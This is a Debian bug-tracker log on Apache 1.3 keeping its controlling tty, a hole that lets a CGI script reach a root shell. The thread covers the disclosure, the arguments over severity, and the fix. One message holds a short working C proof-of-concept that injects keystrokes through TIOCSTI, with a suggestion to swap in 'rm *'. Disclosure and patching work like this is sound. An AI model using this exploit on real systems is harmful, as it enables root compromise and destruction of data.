Debian Bug report logs - #357561
use setsid() to detach from controlling tty

version graph

Package: apache; Maintainer for apache is (unknown);

Reported by: dean gaudet <dean@arctic.org>

Date: Sat, 18 Mar 2006 04:33:05 UTC

Severity: important

Tags: patch, security

Found in versions apache/1.3.34-2, 1.3.33-6sarge3

Fixed in version apache/1.3.34-4.1

Done: Matthew Johnson <debian@matthew.ath.cx>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to dean gaudet <dean@arctic.org>:
New Bug report received and forwarded. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: dean gaudet <dean@arctic.org>
To: submit@bugs.debian.org
Subject: use setsid() to detach from controlling tty
Date: Fri, 17 Mar 2006 20:29:25 -0800 (PST)
Package: apache
Version: 1.3.34-2

i'm not sure i understand the motivation behind patch 033_-F_NO_SETSID ... 

the problem in #244857 is a result of the following behaviour of
setsid(2):

	On error, -1 is returned, and errno is set.  The only error
	which can happen is EPERM. It is returned  when  the  process
	group ID of any process equals the PID of the calling process.
	Thus, in particular, setsid() fails if the calling process is
	already a process group leader.

the user invoked "apache -F" which doesn't fork() before attempting
setsid() ... this fails with EPERM... and apache foolishly exits.

the real fix is to just warn on that error from setsid() and continue.

the fix that's currently in debian apache (use setpgrp()) leaves apache
with a controlling tty... which is a bad thing, see setpgrp(2):

	If a session has a controlling terminal, CLOCAL is not set and
	a hangup occurs, then the session leader is sent a SIGHUP. If
	the session leader exits, the SIGHUP signal will be sent to
	each process in the foreground process group of  the  con-
	trolling terminal.

please consider reverting 033_-F_NO_SETSID and/or allow setsid() to fail
with EPERM when do_detach == 0.

thanks
-dean



Severity set to `serious'. Request was from dean gaudet <dean@arctic.org> to control@bugs.debian.org. (full text, mbox, link).


Severity set to `normal'. Request was from Steve Langasek <vorlon@debian.org> to control@bugs.debian.org. (full text, mbox, link).


Severity set to `important'. Request was from dean gaudet <dean@arctic.org> to control@bugs.debian.org. (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Richard Thrippleton <ret28@cam.ac.uk>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #16 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Richard Thrippleton <ret28@cam.ac.uk>
To: 357561@bugs.debian.org
Subject: Relation to escalation to root
Date: Wed, 17 Jan 2007 17:42:15 +0000
If I have understood this correctly, preserving the controlling tty like this
allows an escalation from www-data to root. If, for example, I run
"/etc/init.d/apache start" from a root shell which I don't close soon after,
a resulting apache process running as www-data will share a controlling tty
with a root shell. A remote compromise of that process can then just inject
characters using TIOCSTI and execute commands as root.
In my opinion, it's not immensely unreasonable to manually bring down apache
and start it up again from a shell.
Why is this bug still unresolved after so long? The current workaround is of
course to immediately kill any terminal that has just invoked apache.

Richard



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Richard Thrippleton <ret28@cam.ac.uk>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #21 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Richard Thrippleton <ret28@cam.ac.uk>
To: 357561@bugs.debian.org
Subject: CGI scripts can get root
Date: Mon, 22 Jan 2007 11:05:45 +0000
I noticed that suexec doesn't abdicate the controlling terminal either, and I'd
not be surprised to find out that non-suexec CGI invocation didn't do this
either. The result is that I've just been able to escalate from local user -->
root by writing a hostile CGI script - this is no longer just a case of having
to find an exploit in apache itself.

Richard



Tags added: security Request was from Richard Thrippleton <ret28@cam.ac.uk> to control@bugs.debian.org. (full text, mbox, link).


Severity set to `critical' from `important' Request was from Richard Thrippleton <ret28@cam.ac.uk> to control@bugs.debian.org. (full text, mbox, link).


Severity set to `important' from `critical' Request was from Steve Langasek <vorlon@debian.org> to control@bugs.debian.org. (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Richard Thrippleton <ret28@cam.ac.uk>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #32 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Richard Thrippleton <ret28@cam.ac.uk>
To: 357561@bugs.debian.org
Subject: Proposed fix
Date: Tue, 30 Jan 2007 18:14:01 +0000
To fix this problem, revert the 033_-F_NO_SETSID patch. It only introduced
minor functionality, and if anyone really cares about having it, they can try
submitting a new patch. One that doesn't introduce a root exploit into the
package, ideally.

Richard



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Matthew Johnson <debian@matthew.ath.cx>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #37 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Matthew Johnson <debian@matthew.ath.cx>
To: 357561@bugs.debian.org
Cc: control@bugs.debian.org
Subject: Fix with patch
Date: Fri, 23 Feb 2007 11:40:00 +0000 (GMT)
[Message part 1 (text/plain, inline)]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

tags 357561 +patch
thanks

Replacing 033_-F_NO_SETSID with the attached patch which allows setsid()
to fail when do_detach == 0 should retain the fix for #244857 while also
closing the local root hole present with 033_-F_NO_SETSID.
514_nice_proxy_cache_cleanup also needs updating as it patches against
the same file (also attached).

I have prepared an NMU with the attached patches, which can be found at
http://mjj29.matthew.ath.cx/debian-upload/apache/. I hope that the RMs
will consider this change for etch as it closes a potential (if not
high-priority) root exploit in our apache package. I am not a DD, so I
shall be looking for a sponsor to upload this package if the apache
maintenance team don't do so first.

Matt

- -- 
Matthew Johnson
http://www.matthew.ath.cx/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
Comment: Made with pgp4pine 1.76

iD8DBQFF3tKXpldmHVvob7kRAl3NAJ467Viwp2SA8miCeZ4DPogTAOxs7QCgy+cf
KqhjdLmai8JitwUgNHDMnwQ=
=EgvR
-----END PGP SIGNATURE-----
[033_SETSID_allowfail (text/plain, ATTACHMENT)]
diff -Naurd build-tree.orig/apache_1.3.34/src/main/http_main.c build-tree/apache_1.3.34/src/main/http_main.c
--- build-tree.orig/apache_1.3.34/src/main/http_main.c	2005-04-05 13:21:33.000000000 +0100
+++ build-tree/apache_1.3.34/src/main/http_main.c	2007-02-23 10:26:42.419661192 +0000
@@ -3451,7 +3451,10 @@
 	if (!do_detach) 
 	    fprintf(stderr, "setsid() failed probably because you aren't "
 		"running under a process management tool like daemontools\n");
-	exit(1);
+  /* Don't exit because of setsid() when we aren't
+   * detaching, it fails then anyway. */
+	else
+	   exit(1);
     }
 #elif defined(NEXT) || defined(NEWSOS)
     if (setpgrp(0, getpid()) == -1 || (pgrp = getpgrp(0)) == -1) {
[514_nice_proxy_cache_cleanup (text/plain, ATTACHMENT)]
diff -Naurd build-tree.orig/apache_1.3.34/src/modules/proxy/proxy_cache.c build-tree/apache_1.3.34/src/modules/proxy/proxy_cache.c
--- build-tree.orig/apache_1.3.34/src/modules/proxy/proxy_cache.c	2007-02-23 11:00:19.641729000 +0000
+++ build-tree/apache_1.3.34/src/modules/proxy/proxy_cache.c	2007-02-23 11:01:29.490094942 +0000
@@ -191,6 +191,7 @@
 
         case 0:         /* Child */
             /* The setpgrp() stuff was snarfed from http_main.c */
+      	   nice(10);
 #ifndef NO_SETSID
             if ((pgrp = setsid()) == -1) {
                 perror("setsid");

Tags added: patch Request was from Matthew Johnson <debian@matthew.ath.cx> to control@bugs.debian.org. (full text, mbox, link).


Tags added: security Request was from Loic Minier <lool@dooz.org> to control@bugs.debian.org. (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Kees Cook <kees@outflux.net>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #46 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Kees Cook <kees@outflux.net>
To: 357561@bugs.debian.org
Subject: reproduce?
Date: Mon, 26 Feb 2007 15:17:15 -0800
Can anyone reproduce this?  Apache seems to have closed the tty fd well 
before running a CGI.  I haven't been successful abusing it with 
TIOCSTI.  Does anyone see a way that this is actually a security 
problem?

-- 
Kees Cook                                            @outflux.net



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Richard Thrippleton <ret28@cam.ac.uk>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #51 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Richard Thrippleton <ret28@cam.ac.uk>
To: 357561@bugs.debian.org
Subject: re: reproduce?
Date: Tue, 27 Feb 2007 00:15:06 +0000
Yes, Apache closes fds 0,1 and 2 (well, reopens them to /dev/null) , but
retains the controlling tty - this can be accessed via opening /dev/tty . The
controlling tty is a process property that is separate from the fds it has
open, and allows certain ioctl powers on any fd matching that. A 'ps' listing
will show the controlling tty of each process - you'll notice that most servers
have '?', but apache will have something of the form 'pts/n' or 'ttyn' so long
as the shell that spawned it is still open. This is the sample exploit code;

#include <fcntl.h>
#include <assert.h>
#include <sys/ioctl.h>
#include <termios.h>
#include <sys/select.h>
#include <sys/types.h>
#include <unistd.h>

int main(char** args,int argc)
{
    const char* fake = "echo lol you got owned\n";
    const char* fake_ptr = fake;
    int pts = open("/dev/tty",O_RDONLY);
    while(*fake_ptr != '\0')
    {
        ioctl(pts,TIOCSTI,fake_ptr);
        fake_ptr++;
    }

    return 0;
}



Install it as a local user's CGI (I've verified this under suexec at least),
and have the webserver run it. If the shell that ran the apache init script is
still open, it will actually execute the command and echo out "lol you got
owned". Substitute this for rm *  as you see fit.

Richard



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Kees Cook <kees@outflux.net>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #56 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Kees Cook <kees@outflux.net>
To: 357561@bugs.debian.org
Subject: ah, yes
Date: Mon, 26 Feb 2007 20:41:57 -0800
Ah yeah, I need to read my Stevens book a bit more closely.  Duh, reopen 
/dev/tty.  So, yes, I can totally confirm this problem.

-- 
Kees Cook                                            @outflux.net



Severity set to `grave' from `important' Request was from Kees Cook <kees@outflux.net> to control@bugs.debian.org. (full text, mbox, link).


Severity set to `important' from `grave' Request was from Steve Langasek <vorlon@debian.org> to control@bugs.debian.org. (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Stefan Foerster <stefan@stefan-foerster.de>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #65 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Stefan Foerster <stefan@stefan-foerster.de>
To: Debian Bug Tracking System <357561@bugs.debian.org>
Subject: apache: Patch included in sarge?
Date: Tue, 27 Feb 2007 21:19:57 +0100
Package: apache
Version: 1.3.33-6sarge3
Followup-For: Bug #357561


I noticed that this patch is included in the source package you get by typing
"apt get source apache", diff file is apache_1.3.33-6sarge3.diff.gz. I made
a diff of both patches and apart from line numbers, they seem to be the same.


-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.4.20-wolk4.18s
Locale: LANG=C, LC_CTYPE=de_DE@euro (charmap=ISO-8859-15)

Versions of packages apache depends on:
ii  apache-common         1.3.33-6sarge3     support files for all Apache webse
ii  debconf               1.4.30.13          Debian configuration management sy
ii  dpkg                  1.10.28            Package maintenance system for Deb
ii  libc6                 2.3.2.ds1-22sarge5 GNU C Library: Shared libraries an
ii  libdb4.2              4.2.52-18          Berkeley v4.2 Database Libraries [
ii  libexpat1             1.95.8-3           XML parsing C library - runtime li
ii  libmagic1             4.12-1             File type determination library us
ii  logrotate             3.7-5              Log rotation utility
ii  mime-support          3.28-1             MIME files 'mime.types' & 'mailcap
ii  perl                  5.8.4-8sarge5      Larry Wall's Practical Extraction 

-- debconf information excluded



Information forwarded to debian-bugs-dist@lists.debian.org, debian-security@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Daniel Leidert <daniel.leidert@wgdd.de>:
Extra info received and forwarded to list. Copy sent to debian-security@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #70 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Daniel Leidert <daniel.leidert@wgdd.de>
To: Debian Bug Tracking System <357561@bugs.debian.org>
Subject: privilege escalation hole
Date: Thu, 01 Mar 2007 04:30:58 +0100
Package: apache
Followup-For: Bug #357561

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Why isn't anybody of the official maintainers reacting or commenting on
this bug? There are 3(!) completely undocumented downgrades of a bug,
that IMHO (from reading) fits the "grave" severity. Please react or comment,
when we can expect a fixed package or why this bug-severity can be downgraded
or the situation will become really annoying.

CCing debian-security

Regards, Daniel

- -- System Information:
Debian Release: 4.0
  APT prefers unstable
  APT policy: (850, 'unstable'), (700, 'testing'), (550, 'stable'), (110, 'experimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18.11
Locale: LANG=de_DE, LC_CTYPE=de_DE (charmap=ISO-8859-1)

Versions of packages apache depends on:
ii  apache-common               1.3.34-4     support files for all Apache webse
ii  debconf [debconf-2.0]       1.5.12       Debian configuration management sy
ii  libc6                       2.3.6.ds1-13 GNU C Library: Shared libraries
ii  libdb4.4                    4.4.20-8     Berkeley v4.4 Database Libraries [
ii  libexpat1                   1.95.8-3.4   XML parsing C library - runtime li
ii  libmagic1                   4.19-1       File type determination library us
ii  logrotate                   3.7.1-3      Log rotation utility
ii  lsb-base                    3.1-23       Linux Standard Base 3.1 init scrip
ii  mime-support                3.39-1       MIME files 'mime.types' & 'mailcap
ii  perl                        5.8.8-7      Larry Wall's Practical Extraction 

apache recommends no packages.

- -- debconf information excluded

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF5kjym0bx+wiPa4wRAip3AJ9irtHP4T9E7haBQ/8P20FThEv2swCgjkkS
0oxBDO4ECfJu1ZflZoNsyOQ=
=rvc7
-----END PGP SIGNATURE-----



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Russ Allbery <rra@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #75 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Russ Allbery <rra@debian.org>
To: Daniel Leidert <daniel.leidert@wgdd.de>
Cc: 357561@bugs.debian.org
Subject: Re: Bug#357561: privilege escalation hole
Date: Wed, 28 Feb 2007 19:45:28 -0800
Daniel Leidert <daniel.leidert@wgdd.de> writes:

> Package: apache
> Followup-For: Bug #357561

> Why isn't anybody of the official maintainers reacting or commenting on
> this bug? There are 3(!) completely undocumented downgrades of a bug,
> that IMHO (from reading) fits the "grave" severity.

The downgrades aren't undocumented.  Look at the full downgrade messages.
The first time it was downgraded, the comment was:

    unexplained severity inflation

Then an explanation was added, and the second time the bug was downgraded,
the comment was:

    holes depending on terminal exploits have not been treated as RC

which I believe is still correct.

Controlling terminal exploits are possible but hard, and in this
particular case, requires a fairly specific alignment of issues: Apache
must be started with -F, which is an unusual way of running Apache to
start with, and the root shell has to be left open long enough for someone
to discover this state and run an exploit.  Usually people who routinely
run Apache with -F are doing so via something like runit or supervise,
which already won't have a controlling terminal, and running Apache -F by
hand is normally only done for debugging.

I certainly agree that it would be good to fix the bug, but I also can see
why the severity was downgraded.

-- 
Russ Allbery (rra@debian.org)               <http://www.eyrie.org/~eagle/>



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Joey Hess <joeyh@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #80 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Joey Hess <joeyh@debian.org>
To: Daniel Leidert <daniel.leidert@wgdd.de>, 357561@bugs.debian.org
Subject: Re: Bug#357561: privilege escalation hole
Date: Wed, 28 Feb 2007 23:32:23 -0500
[Message part 1 (text/plain, inline)]
Daniel Leidert wrote:
> Why isn't anybody of the official maintainers reacting or commenting on
> this bug? There are 3(!) completely undocumented downgrades of a bug,

# holes depending on terminal exploits have not been treated as RC

I suspect that the above downgrade message from vorlon is the one that
you missed seeing. He's probably referring to various other terminal
exploits, such as escape character issues with eterm. This seems like a
significantly different class of problem than those, though, IMHO.

OTOH, not all security holes are grave and the circumstances needed to
exploit this one seem sufficiently rare to not consider it grave.

On the third hand, this bug has documented a security hole with exploit
in apache for about 2 weeks without any reaction from its maintainers,
and was open for many months before that without any reaction from them.
If apache isn't being maintained, it might be better to drop it from
etch anyway.

-- 
see shy jo
[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Jeroen van Wolffelaar <jeroen@wolffelaar.nl>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #85 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Jeroen van Wolffelaar <jeroen@wolffelaar.nl>
To: Russ Allbery <rra@debian.org>, 357561@bugs.debian.org
Cc: Daniel Leidert <daniel.leidert@wgdd.de>
Subject: Re: Bug#357561: privilege escalation hole
Date: Thu, 1 Mar 2007 08:09:50 +0100
On Wed, Feb 28, 2007 at 07:45:28PM -0800, Russ Allbery wrote:
> I certainly agree that it would be good to fix the bug, but I also can see
> why the severity was downgraded.

I think Russ explained pretty nicely why this escalation is pretty rare
from being a true vulnerability, although there indeed is an attack
window if you do -F, forget about it, forget about the terminal (until
cron.daily where apache gets restarted by logrotate).

Anyway, from talking to Fabbione, NMU's are always welcome if someone
wants to properly test the patch such that it does what it claims it
does -- the idea behind the patch is ok in any case.

--Jeroen

-- 
Jeroen van Wolffelaar
Jeroen@wolffelaar.nl (also for Jabber & MSN; ICQ: 33944357)
http://Jeroen.A-Eskwadraat.nl



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Adam Conrad <adconrad@0c3.net>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #90 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Adam Conrad <adconrad@0c3.net>
To: Joey Hess <joeyh@debian.org>, 357561@bugs.debian.org
Cc: Daniel Leidert <daniel.leidert@wgdd.de>
Subject: Re: Bug#357561: privilege escalation hole
Date: Thu, 01 Mar 2007 18:14:41 +1100
Joey Hess wrote:
> 
> On the third hand, this bug has documented a security hole with exploit
> in apache for about 2 weeks without any reaction from its maintainers,
> and was open for many months before that without any reaction from them.
> If apache isn't being maintained, it might be better to drop it from
> etch anyway.

I have every intention of uploading to fix this ASAP, this week's just
been... "Special".

... Adam



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Jeroen van Wolffelaar <jeroen@wolffelaar.nl>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #95 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Jeroen van Wolffelaar <jeroen@wolffelaar.nl>
To: Adam Conrad <adconrad@0c3.net>, 357561@bugs.debian.org
Cc: Joey Hess <joeyh@debian.org>, Daniel Leidert <daniel.leidert@wgdd.de>
Subject: Re: Bug#357561: privilege escalation hole
Date: Thu, 1 Mar 2007 08:31:47 +0100
On Thu, Mar 01, 2007 at 06:14:41PM +1100, Adam Conrad wrote:
> Joey Hess wrote:
> > 
> > On the third hand, this bug has documented a security hole with exploit
> > in apache for about 2 weeks without any reaction from its maintainers,
> > and was open for many months before that without any reaction from them.
> > If apache isn't being maintained, it might be better to drop it from
> > etch anyway.
> 
> I have every intention of uploading to fix this ASAP, this week's just
> been... "Special".

Just as every other week from mid-march 2006 till now :)?

--Jeroen

-- 
Jeroen van Wolffelaar
Jeroen@wolffelaar.nl (also for Jabber & MSN; ICQ: 33944357)
http://Jeroen.A-Eskwadraat.nl



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Matthew Johnson <debian@matthew.ath.cx>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #100 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Matthew Johnson <debian@matthew.ath.cx>
To: 357561@bugs.debian.org
Subject: Re: Bug#357561: privilege escalation hole
Date: Thu, 1 Mar 2007 09:32:42 +0000 (GMT)
The description given is somewhat incorrect. The escalation exists
whether run with -F or not. 033_-F_NOSETSID disables running setsid in
all cases. This means that running /etc/init.d/apache start and then not
closing the terminal (and people do have long-running shells like this)
leaves you vulnerable---this has been verified by richard thrippleton.

I've tested my patch and it both closes this vulnerability while still
allowing use of apache with -F. Please could someone upload the NMU I
linked to above.

Thanks,
Matt

-- 
Matthew Johnson
http://www.matthew.ath.cx/



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Richard Thrippleton <ret28@cam.ac.uk>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #105 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Richard Thrippleton <ret28@cam.ac.uk>
To: 357561@bugs.debian.org
Subject: Severity
Date: Thu, 1 Mar 2007 11:19:42 +0000
As the person who found and has thoroughly tested this bug, I can confirm
firsthand that this isn't just a case of apache being vulnerable with "-F"! I
specifically mentioned using the init script in the original report over a
month ago, not "-F". That is, the circumstances required to exploit this are
not 'rare'.
With this in mind, I'm still confused as to why if you can root a machine with
a buffer overflow, it's critical, but if you can root a machine using a
terminal exploit, it's not. Either way, you end up with an owned machine, the
method is unimportant.

Richard



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Daniel Leidert <daniel.leidert@wgdd.de>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #110 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Daniel Leidert <daniel.leidert@wgdd.de>
To: 357561@bugs.debian.org
Cc: ml_debian-security <debian-security@lists.debian.org>
Subject: Re: Bug#357561: privilege escalation hole
Date: Thu, 01 Mar 2007 16:49:38 +0100
Am Mittwoch, den 28.02.2007, 19:45 -0800 schrieb Russ Allbery:
> Daniel Leidert <daniel.leidert@wgdd.de> writes:
> 
> > Package: apache
> > Followup-For: Bug #357561
> 
> > Why isn't anybody of the official maintainers reacting or commenting on
> > this bug? There are 3(!) completely undocumented downgrades of a bug,
> > that IMHO (from reading) fits the "grave" severity.
> 
> The downgrades aren't undocumented.  Look at the full downgrade messages.

I'm sorry. You are right. I was just taking an overview of the full
texts and expected any comment after the bts-command. I see it now and I
say sorry to Steve Langasek. I was in hurry and annoyed by the fact,
that although this bug is now open for almost a year, there were 3
severity downgrades, but no real reaction. Didn't know that special
treating of terminal exploits.

Regards, Daniel




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Moritz Muehlenhoff <jmm@inutil.org>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #115 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Moritz Muehlenhoff <jmm@inutil.org>
To: Joey Hess <joeyh@debian.org>
Cc: Daniel Leidert <daniel.leidert@wgdd.de>, 357561@bugs.debian.org
Subject: Re: Bug#357561: privilege escalation hole
Date: Fri, 2 Mar 2007 00:33:56 +0100
Joey Hess wrote:
> On the third hand, this bug has documented a security hole with exploit
> in apache for about 2 weeks without any reaction from its maintainers,
> and was open for many months before that without any reaction from them.
> If apache isn't being maintained, it might be better to drop it from
> etch anyway.

Indeed, I'm quite disappointed about apache 1.3 still being in Etch.
Debian is the _only_ distribution still shipping it; the maintainers
couldn't provide _any_ valid reason to still include it (like an important
module not ported to 2.x) and claimed that they would provide all security
updates for 1.3 issues. Well...

Cheers,
        Moritz



Reply sent to Matthew Johnson <debian@matthew.ath.cx>:
You have taken responsibility. (full text, mbox, link).


Notification sent to dean gaudet <dean@arctic.org>:
Bug acknowledged by developer. (full text, mbox, link).


Message #120 received at 357561-close@bugs.debian.org (full text, mbox, reply):

From: Matthew Johnson <debian@matthew.ath.cx>
To: 357561-close@bugs.debian.org
Subject: Bug#357561: fixed in apache 1.3.34-4.1
Date: Sun, 04 Mar 2007 02:47:03 +0000
Source: apache
Source-Version: 1.3.34-4.1

We believe that the bug you reported is fixed in the latest version of
apache, which is due to be installed in the Debian FTP archive:

apache-common_1.3.34-4.1_i386.deb
  to pool/main/a/apache/apache-common_1.3.34-4.1_i386.deb
apache-dbg_1.3.34-4.1_i386.deb
  to pool/main/a/apache/apache-dbg_1.3.34-4.1_i386.deb
apache-dev_1.3.34-4.1_all.deb
  to pool/main/a/apache/apache-dev_1.3.34-4.1_all.deb
apache-doc_1.3.34-4.1_all.deb
  to pool/main/a/apache/apache-doc_1.3.34-4.1_all.deb
apache-perl_1.3.34-4.1_i386.deb
  to pool/main/a/apache/apache-perl_1.3.34-4.1_i386.deb
apache-ssl_1.3.34-4.1_i386.deb
  to pool/main/a/apache/apache-ssl_1.3.34-4.1_i386.deb
apache_1.3.34-4.1.diff.gz
  to pool/main/a/apache/apache_1.3.34-4.1.diff.gz
apache_1.3.34-4.1.dsc
  to pool/main/a/apache/apache_1.3.34-4.1.dsc
apache_1.3.34-4.1_i386.deb
  to pool/main/a/apache/apache_1.3.34-4.1_i386.deb
libapache-mod-perl_1.29.0.4-4.1_i386.deb
  to pool/main/a/apache/libapache-mod-perl_1.29.0.4-4.1_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 357561@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Matthew Johnson <debian@matthew.ath.cx> (supplier of updated apache package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Fri, 23 Feb 2007 11:37:58 +0000
Source: apache
Binary: apache-dev apache-common apache-doc apache apache-dbg apache-perl apache-ssl libapache-mod-perl
Architecture: source i386 all
Version: 1.3.34-4.1
Distribution: unstable
Urgency: low
Maintainer: Debian Apache Maintainers <debian-apache@lists.debian.org>
Changed-By: Matthew Johnson <debian@matthew.ath.cx>
Description: 
 apache     - versatile, high-performance HTTP server
 apache-common - support files for all Apache webservers
 apache-dbg - debug versions of the Apache webservers
 apache-dev - development kit for the Apache webserver
 apache-doc - documentation for the Apache webserver
 apache-perl - versatile, high-performance HTTP server with Perl support
 apache-ssl - versatile, high-performance HTTP server with SSL support
 libapache-mod-perl - integration of perl with the Apache web server
Closes: 357561
Changes: 
 apache (1.3.34-4.1) unstable; urgency=low
 .
   * Non-Mainainer Upload.
   * Revert 033_-F_NO_SETSID patch and re-fix #244857 in such a way that a
     local root hole is not created (Closes: #357561)
Files: 
 e27b358ed7ec919c5bd09a41def20950 1086 web optional apache_1.3.34-4.1.dsc
 79cc70f1e4e87870350a7380ea69a0b0 352555 web optional apache_1.3.34-4.1.diff.gz
 f7e645919117152b607af2edbf16d80b 1195920 doc optional apache-doc_1.3.34-4.1_all.deb
 22e5342357ef629c0bf4883054bfd1b8 333196 devel extra apache-dev_1.3.34-4.1_all.deb
